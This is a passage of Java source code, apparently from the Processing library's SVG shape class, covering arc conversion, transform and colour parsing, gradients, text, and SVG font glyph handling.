return; }\n\n rx = PApplet.abs(rx); ry = PApplet.abs(ry);\n\n float phi = PApplet.radians(((angle % 360) + 360) % 360);\n float cosPhi = PApplet.cos(phi), sinPhi = PApplet.sin(phi);\n\n float x1r = ( cosPhi * (x1 - x2) + sinPhi * (y1 - y2)) / 2;\n float y1r = (-sinPhi * (x1 - x2) + cosPhi * (y1 - y2)) / 2;\n\n float cxr, cyr;\n {\n float A = (x1r*x1r) / (rx*rx) + (y1r*y1r) / (ry*ry);\n if (A > 1) {\n // No solution, scale ellipse up according to SVG standard\n float sqrtA = PApplet.sqrt(A);\n rx *= sqrtA; cxr = 0;\n ry *= sqrtA; cyr = 0;\n } else {\n float k = ((fa == fs) ? -1f : 1f) *\n PApplet.sqrt((rx*rx * ry*ry) / ((rx*rx * y1r*y1r) + (ry*ry * x1r*x1r)) - 1f);\n cxr = k * rx * y1r / ry;\n cyr = -k * ry * x1r / rx;\n }\n }\n\n float cx = cosPhi * cxr - sinPhi * cyr + (x1 + x2) / 2;\n float cy = sinPhi * cxr + cosPhi * cyr + (y1 + y2) / 2;\n\n float phi1, phiDelta;\n {\n float sx = ( x1r - cxr) / rx, sy = ( y1r - cyr) / ry;\n float tx = (-x1r - cxr) / rx, ty = (-y1r - cyr) / ry;\n phi1 = PApplet.atan2(sy, sx);\n phiDelta = (((PApplet.atan2(ty, tx) - phi1) % TWO_PI) + TWO_PI) % TWO_PI;\n if (!fs) phiDelta -= TWO_PI;\n }\n\n // One segment can not cover more that PI, less than PI/2 is\n // recommended to avoid visible inaccuracies caused by rounding errors\n int segmentCount = PApplet.ceil(PApplet.abs(phiDelta) / TWO_PI * 4);\n\n float inc = phiDelta / segmentCount;\n float a = PApplet.sin(inc) *\n (PApplet.sqrt(4 + 3 * PApplet.sq(PApplet.tan(inc / 2))) - 1) / 3;\n\n float sinPhi1 = PApplet.sin(phi1), cosPhi1 = PApplet.cos(phi1);\n\n float p1x = x1;\n float p1y = y1;\n float relq1x = a * (-rx * cosPhi * sinPhi1 - ry * sinPhi * cosPhi1);\n float relq1y = a * (-rx * sinPhi * sinPhi1 + ry * cosPhi * cosPhi1);\n\n for (int i = 0; i < segmentCount; i++) {\n float eta = phi1 + (i + 1) * inc;\n float sinEta = PApplet.sin(eta), cosEta = PApplet.cos(eta);\n\n float p2x = cx + rx * cosPhi * cosEta - ry * sinPhi * sinEta;\n float p2y = cy + rx * sinPhi * cosEta + ry * cosPhi * sinEta;\n float relq2x = a * (-rx * cosPhi * sinEta - ry * sinPhi * cosEta);\n float relq2y = a * (-rx * sinPhi * sinEta + ry * cosPhi * cosEta);\n\n if (i == segmentCount - 1) { p2x = x2; p2y = y2; }\n\n parsePathCode(BEZIER_VERTEX);\n parsePathVertex(p1x + relq1x, p1y + relq1y);\n parsePathVertex(p2x - relq2x, p2y - relq2y);\n parsePathVertex(p2x, p2y);\n\n p1x = p2x; relq1x = relq2x;\n p1y = p2y; relq1y = relq2y;\n }\n }\n\n\n /**\n * Parse the specified SVG matrix into a PMatrix2D. Note that PMatrix2D\n * is rotated relative to the SVG definition, so parameters are rearranged\n * here. 
More about the transformation matrices in\n * this section\n * of the SVG documentation.\n * @param matrixStr text of the matrix param.\n * @return a good old-fashioned PMatrix2D\n */\n static protected PMatrix2D parseTransform(String matrixStr) {\n matrixStr = matrixStr.trim();\n PMatrix2D outgoing = null;\n int start = 0;\n int stop = -1;\n while ((stop = matrixStr.indexOf(')', start)) != -1) {\n PMatrix2D m = parseSingleTransform(matrixStr.substring(start, stop+1));\n if (outgoing == null) {\n outgoing = m;\n } else {\n outgoing.apply(m);\n }\n start = stop + 1;\n }\n return outgoing;\n }\n\n\n static protected PMatrix2D parseSingleTransform(String matrixStr) {\n //String[] pieces = PApplet.match(matrixStr, \"^\\\\s*(\\\\w+)\\\\((.*)\\\\)\\\\s*$\");\n String[] pieces = PApplet.match(matrixStr, \"[,\\\\s]*(\\\\w+)\\\\((.*)\\\\)\");\n if (pieces == null) {\n System.err.println(\"Could not parse transform \" + matrixStr);\n return null;\n }\n float[] m = PApplet.parseFloat(PApplet.splitTokens(pieces[2], \", \"));\n if (pieces[1].equals(\"matrix\")) {\n return new PMatrix2D(m[0], m[2], m[4], m[1], m[3], m[5]);\n\n } else if (pieces[1].equals(\"translate\")) {\n float tx = m[0];\n float ty = (m.length == 2) ? m[1] : m[0];\n return new PMatrix2D(1, 0, tx, 0, 1, ty);\n\n } else if (pieces[1].equals(\"scale\")) {\n float sx = m[0];\n float sy = (m.length == 2) ? m[1] : m[0];\n return new PMatrix2D(sx, 0, 0, 0, sy, 0);\n\n } else if (pieces[1].equals(\"rotate\")) {\n float angle = m[0];\n\n if (m.length == 1) {\n float c = PApplet.cos(angle);\n float s = PApplet.sin(angle);\n // SVG version is cos(a) sin(a) -sin(a) cos(a) 0 0\n return new PMatrix2D(c, -s, 0, s, c, 0);\n\n } else if (m.length == 3) {\n PMatrix2D mat = new PMatrix2D(0, 1, m[1], 1, 0, m[2]);\n mat.rotate(m[0]);\n mat.translate(-m[1], -m[2]);\n return mat;\n }\n\n } else if (pieces[1].equals(\"skewX\")) {\n return new PMatrix2D(1, 0, 1, PApplet.tan(m[0]), 0, 0);\n\n } else if (pieces[1].equals(\"skewY\")) {\n return new PMatrix2D(1, 0, 1, 0, PApplet.tan(m[0]), 0);\n }\n return null;\n }\n\n\n protected void parseColors(XML properties) {\n if (properties.hasAttribute(\"opacity\")) {\n String opacityText = properties.getString(\"opacity\");\n setOpacity(opacityText);\n }\n\n if (properties.hasAttribute(\"stroke\")) {\n String strokeText = properties.getString(\"stroke\");\n setColor(strokeText, false);\n }\n\n if (properties.hasAttribute(\"stroke-opacity\")) {\n String strokeOpacityText = properties.getString(\"stroke-opacity\");\n setStrokeOpacity(strokeOpacityText);\n }\n\n if (properties.hasAttribute(\"stroke-width\")) {\n // if NaN (i.e. 
if it's 'inherit') then default back to the inherit setting\n String lineweight = properties.getString(\"stroke-width\");\n setStrokeWeight(lineweight);\n }\n\n if (properties.hasAttribute(\"stroke-linejoin\")) {\n String linejoin = properties.getString(\"stroke-linejoin\");\n setStrokeJoin(linejoin);\n }\n\n if (properties.hasAttribute(\"stroke-linecap\")) {\n String linecap = properties.getString(\"stroke-linecap\");\n setStrokeCap(linecap);\n }\n\n // fill defaults to black (though stroke defaults to \"none\")\n // http://www.w3.org/TR/SVG/painting.html#FillProperties\n if (properties.hasAttribute(\"fill\")) {\n String fillText = properties.getString(\"fill\");\n setColor(fillText, true);\n }\n\n if (properties.hasAttribute(\"fill-opacity\")) {\n String fillOpacityText = properties.getString(\"fill-opacity\");\n setFillOpacity(fillOpacityText);\n }\n\n if (properties.hasAttribute(\"style\")) {\n String styleText = properties.getString(\"style\");\n String[] styleTokens = PApplet.splitTokens(styleText, \";\");\n\n //PApplet.println(styleTokens);\n for (int i = 0; i < styleTokens.length; i++) {\n String[] tokens = PApplet.splitTokens(styleTokens[i], \":\");\n //PApplet.println(tokens);\n\n tokens[0] = PApplet.trim(tokens[0]);\n\n if (tokens[0].equals(\"fill\")) {\n setColor(tokens[1], true);\n\n } else if(tokens[0].equals(\"fill-opacity\")) {\n setFillOpacity(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke\")) {\n setColor(tokens[1], false);\n\n } else if(tokens[0].equals(\"stroke-width\")) {\n setStrokeWeight(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke-linecap\")) {\n setStrokeCap(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke-linejoin\")) {\n setStrokeJoin(tokens[1]);\n\n } else if(tokens[0].equals(\"stroke-opacity\")) {\n setStrokeOpacity(tokens[1]);\n\n } else if(tokens[0].equals(\"opacity\")) {\n setOpacity(tokens[1]);\n\n } else {\n // Other attributes are not yet implemented\n }\n }\n }\n }\n\n\n void setOpacity(String opacityText) {\n opacity = PApplet.parseFloat(opacityText);\n strokeColor = ((int) (opacity * 255)) << 24 | strokeColor & 0xFFFFFF;\n fillColor = ((int) (opacity * 255)) << 24 | fillColor & 0xFFFFFF;\n }\n\n\n void setStrokeWeight(String lineweight) {\n strokeWeight = parseUnitSize(lineweight, svgSizeXY);\n }\n\n\n void setStrokeOpacity(String opacityText) {\n strokeOpacity = PApplet.parseFloat(opacityText);\n strokeColor = ((int) (strokeOpacity * 255)) << 24 | strokeColor & 0xFFFFFF;\n }\n\n\n void setStrokeJoin(String linejoin) {\n if (linejoin.equals(\"inherit\")) {\n // do nothing, will inherit automatically\n\n } else if (linejoin.equals(\"miter\")) {\n strokeJoin = PConstants.MITER;\n\n } else if (linejoin.equals(\"round\")) {\n strokeJoin = PConstants.ROUND;\n\n } else if (linejoin.equals(\"bevel\")) {\n strokeJoin = PConstants.BEVEL;\n }\n }\n\n\n void setStrokeCap(String linecap) {\n if (linecap.equals(\"inherit\")) {\n // do nothing, will inherit automatically\n\n } else if (linecap.equals(\"butt\")) {\n strokeCap = PConstants.SQUARE;\n\n } else if (linecap.equals(\"round\")) {\n strokeCap = PConstants.ROUND;\n\n } else if (linecap.equals(\"square\")) {\n strokeCap = PConstants.PROJECT;\n }\n }\n\n\n void setFillOpacity(String opacityText) {\n fillOpacity = PApplet.parseFloat(opacityText);\n fillColor = ((int) (fillOpacity * 255)) << 24 | fillColor & 0xFFFFFF;\n }\n\n\n void setColor(String colorText, boolean isFill) {\n colorText = colorText.trim();\n int opacityMask = fillColor & 0xFF000000;\n boolean visible = true;\n int color = 0;\n 
String name = \"\";\n// String lColorText = colorText.toLowerCase();\n Gradient gradient = null;\n// Object paint = null;\n if (colorText.equals(\"none\")) {\n visible = false;\n } else if (colorText.startsWith(\"url(#\")) {\n name = colorText.substring(5, colorText.length() - 1);\n Object object = findChild(name);\n if (object instanceof Gradient) {\n gradient = (Gradient) object;\n // in 3.0a11, do this on first draw inside PShapeJava2D\n// paint = calcGradientPaint(gradient); //, opacity);\n } else {\n// visible = false;\n System.err.println(\"url \" + name + \" refers to unexpected data: \" + object);\n }\n } else {\n // Prints errors itself.\n color = opacityMask | parseSimpleColor(colorText);\n }\n if (isFill) {\n fill = visible;\n fillColor = color;\n fillName = name;\n fillGradient = gradient;\n// fillGradientPaint = paint;\n } else {\n stroke = visible;\n strokeColor = color;\n strokeName = name;\n strokeGradient = gradient;\n// strokeGradientPaint = paint;\n }\n }\n\n\n /**\n * Parses the \"color\" datatype only, and prints an error if it is not of this form.\n * http://www.w3.org/TR/SVG/types.html#DataTypeColor\n * @return 0xRRGGBB (no alpha). Zero on error.\n */\n static protected int parseSimpleColor(String colorText) {\n colorText = colorText.toLowerCase().trim();\n //if (colorNames.containsKey(colorText)) {\n if (colorNames.hasKey(colorText)) {\n return colorNames.get(colorText);\n } else if (colorText.startsWith(\"#\")) {\n if (colorText.length() == 4) {\n // Short form: #ABC, transform to long form #AABBCC\n colorText = colorText.replaceAll(\"^#(.)(.)(.)$\", \"#$1$1$2$2$3$3\");\n }\n return (Integer.parseInt(colorText.substring(1), 16)) & 0xFFFFFF;\n //System.out.println(\"hex for fill is \" + PApplet.hex(fillColor));\n } else if (colorText.startsWith(\"rgb\")) {\n return parseRGB(colorText);\n } else {\n System.err.println(\"Cannot parse \\\"\" + colorText + \"\\\".\");\n return 0;\n }\n }\n\n\n /**\n * Deliberately conforms to the HTML 4.01 color spec + en-gb grey, rather\n * than the (unlikely to be useful) entire 147-color system used in SVG.\n */\n static protected IntDict colorNames = new IntDict(new Object[][] {\n { \"aqua\", 0x00ffff },\n { \"black\", 0x000000 },\n { \"blue\", 0x0000ff },\n { \"fuchsia\", 0xff00ff },\n { \"gray\", 0x808080 },\n { \"grey\", 0x808080 },\n { \"green\", 0x008000 },\n { \"lime\", 0x00ff00 },\n { \"maroon\", 0x800000 },\n { \"navy\", 0x000080 },\n { \"olive\", 0x808000 },\n { \"purple\", 0x800080 },\n { \"red\", 0xff0000 },\n { \"silver\", 0xc0c0c0 },\n { \"teal\", 0x008080 },\n { \"white\", 0xffffff },\n { \"yellow\", 0xffff00 }\n });\n\n /*\n static protected Map colorNames;\n static {\n colorNames = new HashMap();\n colorNames.put(\"aqua\", 0x00ffff);\n colorNames.put(\"black\", 0x000000);\n colorNames.put(\"blue\", 0x0000ff);\n colorNames.put(\"fuchsia\", 0xff00ff);\n colorNames.put(\"gray\", 0x808080);\n colorNames.put(\"grey\", 0x808080);\n colorNames.put(\"green\", 0x008000);\n colorNames.put(\"lime\", 0x00ff00);\n colorNames.put(\"maroon\", 0x800000);\n colorNames.put(\"navy\", 0x000080);\n colorNames.put(\"olive\", 0x808000);\n colorNames.put(\"purple\", 0x800080);\n colorNames.put(\"red\", 0xff0000);\n colorNames.put(\"silver\", 0xc0c0c0);\n colorNames.put(\"teal\", 0x008080);\n colorNames.put(\"white\", 0xffffff);\n colorNames.put(\"yellow\", 0xffff00);\n }\n */\n\n static protected int parseRGB(String what) {\n int leftParen = what.indexOf('(') + 1;\n int rightParen = what.indexOf(')');\n String sub = 
what.substring(leftParen, rightParen);\n String[] values = PApplet.splitTokens(sub, \", \");\n int rgbValue = 0;\n if (values.length == 3) {\n // Color spec allows for rgb values to be percentages.\n for (int i = 0; i < 3; i++) {\n rgbValue <<= 8;\n if (values[i].endsWith(\"%\")) {\n rgbValue |= (int)(PApplet.constrain(255*parseFloatOrPercent(values[i]), 0, 255));\n } else {\n rgbValue |= PApplet.constrain(PApplet.parseInt(values[i]), 0, 255);\n }\n }\n } else System.err.println(\"Could not read color \\\"\" + what + \"\\\".\");\n\n return rgbValue;\n }\n\n\n //static protected Map parseStyleAttributes(String style) {\n static protected StringDict parseStyleAttributes(String style) {\n //Map table = new HashMap();\n StringDict table = new StringDict();\n// if (style == null) return table;\n if (style != null) {\n String[] pieces = style.split(\";\");\n for (int i = 0; i < pieces.length; i++) {\n String[] parts = pieces[i].split(\":\");\n //table.put(parts[0], parts[1]);\n table.set(parts[0], parts[1]);\n }\n }\n return table;\n }\n\n\n /**\n * Used in place of element.getFloatAttribute(a) because we can\n * have a unit suffix (length or coordinate).\n * @param element what to parse\n * @param attribute name of the attribute to get\n * @param relativeTo (float) Used for %. When relative to viewbox, should\n * be svgWidth for horizontal dimentions, svgHeight for vertical, and\n * svgXYSize for anything else.\n * @return unit-parsed version of the data\n */\n static protected float getFloatWithUnit(XML element, String attribute, float relativeTo) {\n String val = element.getString(attribute);\n return (val == null) ? 0 : parseUnitSize(val, relativeTo);\n }\n\n\n /**\n * Parse a size that may have a suffix for its units.\n * This assumes 90dpi, which implies, as given in the\n * units spec:\n *
    \n *
  • \"1pt\" equals \"1.25px\" (and therefore 1.25 user units)\n *
  • \"1pc\" equals \"15px\" (and therefore 15 user units)\n *
  • \"1mm\" would be \"3.543307px\" (3.543307 user units)\n *
  • \"1cm\" equals \"35.43307px\" (and therefore 35.43307 user units)\n *
  • \"1in\" equals \"90px\" (and therefore 90 user units)\n *
\n * @param relativeTo (float) Used for %. When relative to viewbox, should\n * be svgWidth for horizontal dimentions, svgHeight for vertical, and\n * svgXYSize for anything else.\n */\n static protected float parseUnitSize(String text, float relativeTo) {\n int len = text.length() - 2;\n\n if (text.endsWith(\"pt\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 1.25f;\n } else if (text.endsWith(\"pc\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 15;\n } else if (text.endsWith(\"mm\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 3.543307f;\n } else if (text.endsWith(\"cm\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 35.43307f;\n } else if (text.endsWith(\"in\")) {\n return PApplet.parseFloat(text.substring(0, len)) * 90;\n } else if (text.endsWith(\"px\")) {\n return PApplet.parseFloat(text.substring(0, len));\n } else if (text.endsWith(\"%\")) {\n return relativeTo * parseFloatOrPercent(text);\n } else {\n return PApplet.parseFloat(text);\n }\n }\n\n\n static protected float parseFloatOrPercent(String text) {\n text = text.trim();\n if (text.endsWith(\"%\")) {\n return Float.parseFloat(text.substring(0, text.length() - 1)) / 100.0f;\n } else {\n return Float.parseFloat(text);\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class Gradient extends PShapeSVG {\n Matrix transform;\n\n public float[] offset;\n public int[] color;\n public int count;\n\n public Gradient(PShapeSVG parent, XML properties) {\n super(parent, properties, true);\n\n XML elements[] = properties.getChildren();\n offset = new float[elements.length];\n color = new int[elements.length];\n\n // \n for (int i = 0; i < elements.length; i++) {\n XML elem = elements[i];\n String name = elem.getName();\n if (name.equals(\"stop\")) {\n String offsetAttr = elem.getString(\"offset\");\n offset[count] = parseFloatOrPercent(offsetAttr);\n\n String style = elem.getString(\"style\");\n //Map styles = parseStyleAttributes(style);\n StringDict styles = parseStyleAttributes(style);\n\n String colorStr = styles.get(\"stop-color\");\n if (colorStr == null) {\n colorStr = elem.getString(\"stop-color\");\n if (colorStr == null) colorStr = \"#000000\";\n }\n String opacityStr = styles.get(\"stop-opacity\");\n if (opacityStr == null) {\n opacityStr = elem.getString(\"stop-opacity\");\n if (opacityStr == null) opacityStr = \"1\";\n }\n int tupacity = PApplet.constrain(\n (int)(PApplet.parseFloat(opacityStr) * 255), 0, 255);\n color[count] = (tupacity << 24) | parseSimpleColor(colorStr);\n count++;\n }\n }\n offset = PApplet.subset(offset, 0, count);\n color = PApplet.subset(color, 0, count);\n }\n }\n\n\n public class LinearGradient extends Gradient {\n public float x1, y1, x2, y2;\n\n public LinearGradient(PShapeSVG parent, XML properties) {\n super(parent, properties);\n\n this.x1 = getFloatWithUnit(properties, \"x1\", svgWidth);\n this.y1 = getFloatWithUnit(properties, \"y1\", svgHeight);\n this.x2 = getFloatWithUnit(properties, \"x2\", svgWidth);\n this.y2 = getFloatWithUnit(properties, \"y2\", svgHeight);\n\n String transformStr =\n properties.getString(\"gradientTransform\");\n\n if (transformStr != null) {\n float t[] = parseTransform(transformStr).get(null);\n //this.transform = new AffineTransform(t[0], t[3], t[1], t[4], t[2], t[5]);\n transform = new Matrix();\n transform.setValues(new float[] { // TODO don't create temp floats\n t[0], t[1], t[2],\n t[3], t[4], t[5],\n 0, 0, 1\n });\n\n// Point2D t1 = transform.transform(new 
Point2D.Float(x1, y1), null);\n// Point2D t2 = transform.transform(new Point2D.Float(x2, y2), null);\n float[] t1 = new float[] { x1, y1 };\n float[] t2 = new float[] { x2, y2 };\n transform.mapPoints(t1);\n transform.mapPoints(t2);\n\n// this.x1 = (float) t1.getX();\n// this.y1 = (float) t1.getY();\n// this.x2 = (float) t2.getX();\n// this.y2 = (float) t2.getY();\n x1 = t1[0];\n y1 = t1[1];\n x2 = t2[0];\n y2 = t2[1];\n }\n }\n }\n\n\n public class RadialGradient extends Gradient {\n public float cx, cy, r;\n\n public RadialGradient(PShapeSVG parent, XML properties) {\n super(parent, properties);\n\n this.cx = getFloatWithUnit(properties, \"cx\", svgWidth);\n this.cy = getFloatWithUnit(properties, \"cy\", svgHeight);\n this.r = getFloatWithUnit(properties, \"r\", svgSizeXY);\n\n String transformStr =\n properties.getString(\"gradientTransform\");\n\n if (transformStr != null) {\n float t[] = parseTransform(transformStr).get(null);\n// this.transform = new AffineTransform(t[0], t[3], t[1], t[4], t[2], t[5]);\n transform = new Matrix();\n transform.setValues(new float[] { // TODO don't create temp floats\n t[0], t[1], t[2],\n t[3], t[4], t[5],\n 0, 0, 1\n });\n\n// Point2D t1 = transform.transform(new Point2D.Float(cx, cy), null);\n// Point2D t2 = transform.transform(new Point2D.Float(cx + r, cy), null);\n float[] t1 = new float[] { cx, cy };\n float[] t2 = new float[] { cx + r, cy };\n transform.mapPoints(t1);\n transform.mapPoints(t2);\n\n// this.cx = (float) t1.getX();\n// this.cy = (float) t1.getY();\n// this.r = (float) (t2.getX() - t1.getX());\n cx = t1[0];\n cy = t1[1];\n r = t2[0] - t1[0];\n }\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n// static private float TEXT_QUALITY = 1;\n public static final int PLAIN = 0;\n public static final int BOLD = 1;\n public static final int ITALIC = 2;\n\n static private PFont parseFont(XML properties) {\n String fontFamily = null;\n float size = 10;\n int weight = PLAIN; // 0\n int italic = 0;\n\n if (properties.hasAttribute(\"style\")) {\n String styleText = properties.getString(\"style\");\n String[] styleTokens = PApplet.splitTokens(styleText, \";\");\n\n //PApplet.println(styleTokens);\n for (int i = 0; i < styleTokens.length; i++) {\n String[] tokens = PApplet.splitTokens(styleTokens[i], \":\");\n //PApplet.println(tokens);\n\n tokens[0] = PApplet.trim(tokens[0]);\n\n if (tokens[0].equals(\"font-style\")) {\n // PApplet.println(\"font-style: \" + tokens[1]);\n if (tokens[1].contains(\"italic\")) {\n italic = ITALIC;\n }\n } else if (tokens[0].equals(\"font-variant\")) {\n // PApplet.println(\"font-variant: \" + tokens[1]);\n // setFillOpacity(tokens[1]);\n\n } else if (tokens[0].equals(\"font-weight\")) {\n // PApplet.println(\"font-weight: \" + tokens[1]);\n\n if (tokens[1].contains(\"bold\")) {\n weight = BOLD;\n // PApplet.println(\"Bold weight ! 
\");\n }\n\n\n } else if (tokens[0].equals(\"font-stretch\")) {\n // not supported.\n\n } else if (tokens[0].equals(\"font-size\")) {\n // PApplet.println(\"font-size: \" + tokens[1]);\n size = Float.parseFloat(tokens[1].split(\"px\")[0]);\n // PApplet.println(\"font-size-parsed: \" + size);\n } else if (tokens[0].equals(\"line-height\")) {\n // not supported\n\n } else if (tokens[0].equals(\"font-family\")) {\n // PApplet.println(\"Font-family: \" + tokens[1]);\n fontFamily = tokens[1];\n\n } else if (tokens[0].equals(\"text-align\")) {\n // not supported\n\n } else if (tokens[0].equals(\"letter-spacing\")) {\n // not supported\n\n } else if (tokens[0].equals(\"word-spacing\")) {\n // not supported\n\n } else if (tokens[0].equals(\"writing-mode\")) {\n // not supported\n\n } else if (tokens[0].equals(\"text-anchor\")) {\n // not supported\n\n } else {\n // Other attributes are not yet implemented\n }\n }\n }\n if (fontFamily == null) {\n return null;\n }\n// size = size * TEXT_QUALITY;\n\n return createFont(fontFamily, weight | italic, size, true);\n }\n\n\n static protected PFont createFont(String name, int weight,\n float size, boolean smooth) {\n //System.out.println(\"Try to create a font of \" + name + \" family, \" + weight);\n// java.awt.Font baseFont = new java.awt.Font(name, weight, (int) size);\n\n //System.out.println(\"Resulting family : \" + baseFont.getFamily() + \" \" + baseFont.getStyle());\n// return new PFont(baseFont.deriveFont(size), smooth, null);\n return null;\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class Text extends PShapeSVG {\n protected PFont font;\n\n public Text(PShapeSVG parent, XML properties) {\n super(parent, properties, true);\n\n // get location\n float x = Float.parseFloat(properties.getString(\"x\"));\n float y = Float.parseFloat(properties.getString(\"y\"));\n\n if (matrix == null) {\n matrix = new PMatrix2D();\n }\n matrix.translate(x, y);\n\n family = GROUP;\n\n font = parseFont(properties);\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class LineOfText extends PShapeSVG {\n String textToDisplay;\n PFont font;\n\n public LineOfText(PShapeSVG parent, XML properties) {\n // TODO: child should ideally be parsed too for inline content.\n super(parent, properties, false);\n\n //get location\n float x = Float.parseFloat(properties.getString(\"x\"));\n float y = Float.parseFloat(properties.getString(\"y\"));\n\n float parentX = Float.parseFloat(parent.element.getString(\"x\"));\n float parentY = Float.parseFloat(parent.element.getString(\"y\"));\n\n if (matrix == null) matrix = new PMatrix2D();\n matrix.translate(x - parentX, (y - parentY) / 2f);\n\n // get the first properties\n parseColors(properties);\n font = parseFont(properties);\n\n // cleaned up syntax but removing b/c unused [fry 190118]\n //boolean isLine = properties.getString(\"role\").equals(\"line\");\n\n if (this.childCount > 0) {\n // no inline content yet.\n }\n\n String text = properties.getContent();\n textToDisplay = text;\n }\n\n @Override\n public void drawImpl(PGraphics g) {\n if (font == null) {\n font = ((Text) parent).font;\n if (font == null) {\n return;\n }\n }\n\n pre(g);\n// g.textFont(font, font.size / TEXT_QUALITY);\n g.textFont(font, font.size);\n g.text(textToDisplay, 0, 0);\n post(g);\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
.\n\n\n static public class Font extends PShapeSVG {\n public FontFace face;\n\n public Map namedGlyphs;\n public Map unicodeGlyphs;\n\n public int glyphCount;\n public FontGlyph[] glyphs;\n public FontGlyph missingGlyph;\n\n int horizAdvX;\n\n\n public Font(PShapeSVG parent, XML properties) {\n super(parent, properties, false);\n// handle(parent, properties);\n\n XML[] elements = properties.getChildren();\n\n horizAdvX = properties.getInt(\"horiz-adv-x\", 0);\n\n namedGlyphs = new HashMap<>();\n unicodeGlyphs = new HashMap<>();\n glyphCount = 0;\n glyphs = new FontGlyph[elements.length];\n\n for (int i = 0; i < elements.length; i++) {\n String name = elements[i].getName();\n XML elem = elements[i];\n if (name == null) {\n // skip it\n } else if (name.equals(\"glyph\")) {\n FontGlyph fg = new FontGlyph(this, elem, this);\n if (fg.isLegit()) {\n if (fg.name != null) {\n namedGlyphs.put(fg.name, fg);\n }\n if (fg.unicode != 0) {\n unicodeGlyphs.put(Character.valueOf(fg.unicode), fg);\n }\n }\n glyphs[glyphCount++] = fg;\n\n } else if (name.equals(\"missing-glyph\")) {\n// System.out.println(\"got missing glyph inside \");\n missingGlyph = new FontGlyph(this, elem, this);\n } else if (name.equals(\"font-face\")) {\n face = new FontFace(this, elem);\n } else {\n System.err.println(\"Ignoring \" + name + \" inside \");\n }\n }\n }\n\n\n protected void drawShape() {\n // does nothing for fonts\n }\n\n\n public void drawString(PGraphics g, String str, float x, float y, float size) {\n // 1) scale by the 1.0/unitsPerEm\n // 2) scale up by a font size\n g.pushMatrix();\n float s = size / face.unitsPerEm;\n //System.out.println(\"scale is \" + s);\n // swap y coord at the same time, since fonts have y=0 at baseline\n g.translate(x, y);\n g.scale(s, -s);\n char[] c = str.toCharArray();\n for (int i = 0; i < c.length; i++) {\n // call draw on each char (pulling it w/ the unicode table)\n FontGlyph fg = unicodeGlyphs.get(Character.valueOf(c[i]));\n if (fg != null) {\n fg.draw(g);\n // add horizAdvX/unitsPerEm to the x coordinate along the way\n g.translate(fg.horizAdvX, 0);\n } else {\n System.err.println(\"'\" + c[i] + \"' not available.\");\n }\n }\n g.popMatrix();\n }\n\n\n public void drawChar(PGraphics g, char c, float x, float y, float size) {\n g.pushMatrix();\n float s = size / face.unitsPerEm;\n g.translate(x, y);\n g.scale(s, -s);\n FontGlyph fg = unicodeGlyphs.get(Character.valueOf(c));\n if (fg != null) g.shape(fg);\n g.popMatrix();\n }\n\n\n public float textWidth(String str, float size) {\n float w = 0;\n char[] c = str.toCharArray();\n for (int i = 0; i < c.length; i++) {\n // call draw on each char (pulling it w/ the unicode table)\n FontGlyph fg = unicodeGlyphs.get(Character.valueOf(c[i]));\n if (fg != null) {\n w += (float) fg.horizAdvX / face.unitsPerEm;\n }\n }\n return w * size;\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
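  // Note on Font.drawString() above: glyph outlines are stored in font units with the
  // y axis pointing up from the baseline, so drawing scales by size/unitsPerEm with a
  // negated y scale and advances by each glyph's horizAdvX between characters.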
.\n\n\n static class FontFace extends PShapeSVG {\n int horizOriginX; // dflt 0\n int horizOriginY; // dflt 0\n // int horizAdvX; // no dflt?\n int vertOriginX; // dflt horizAdvX/2\n int vertOriginY; // dflt ascent\n int vertAdvY; // dflt 1em (unitsPerEm value)\n\n String fontFamily;\n int fontWeight; // can also be normal or bold (also comma separated)\n String fontStretch;\n int unitsPerEm; // dflt 1000\n int[] panose1; // dflt \"0 0 0 0 0 0 0 0 0 0\"\n int ascent;\n int descent;\n int[] bbox; // spec says comma separated, tho not w/ forge\n int underlineThickness;\n int underlinePosition;\n //String unicodeRange; // gonna ignore for now\n\n\n public FontFace(PShapeSVG parent, XML properties) {\n super(parent, properties, true);\n\n unitsPerEm = properties.getInt(\"units-per-em\", 1000);\n }\n\n\n protected void drawShape() {\n // nothing to draw in the font face attribute\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class FontGlyph extends PShapeSVG { // extends Path\n public String name;\n char unicode;\n int horizAdvX;\n\n public FontGlyph(PShapeSVG parent, XML properties, Font font) {\n super(parent, properties, true);\n super.parsePath(); // ??\n\n name = properties.getString(\"glyph-name\");\n String u = properties.getString(\"unicode\");\n unicode = 0;\n if (u != null) {\n if (u.length() == 1) {\n unicode = u.charAt(0);\n //System.out.println(\"unicode for \" + name + \" is \" + u);\n } else {\n System.err.println(\"unicode for \" + name +\n \" is more than one char: \" + u);\n }\n }\n if (properties.hasAttribute(\"horiz-adv-x\")) {\n horizAdvX = properties.getInt(\"horiz-adv-x\");\n } else {\n horizAdvX = font.horizAdvX;\n }\n }\n\n\n protected boolean isLegit() { // TODO need a better way to handle this...\n return vertexCount != 0;\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n /**\n * Get a particular element based on its SVG ID. When editing SVG by hand,\n * this is the id=\"\" tag on any SVG element. When editing from Illustrator,\n * these IDs can be edited by expanding the layers palette. The names used\n * in the layers palette, both for the layers or the shapes and groups\n * beneath them can be used here.\n *
\n   * // This code grabs \"Layer 3\" and the shapes beneath it.\n   * PShape layer3 = svg.getChild(\"Layer 3\");\n   * 
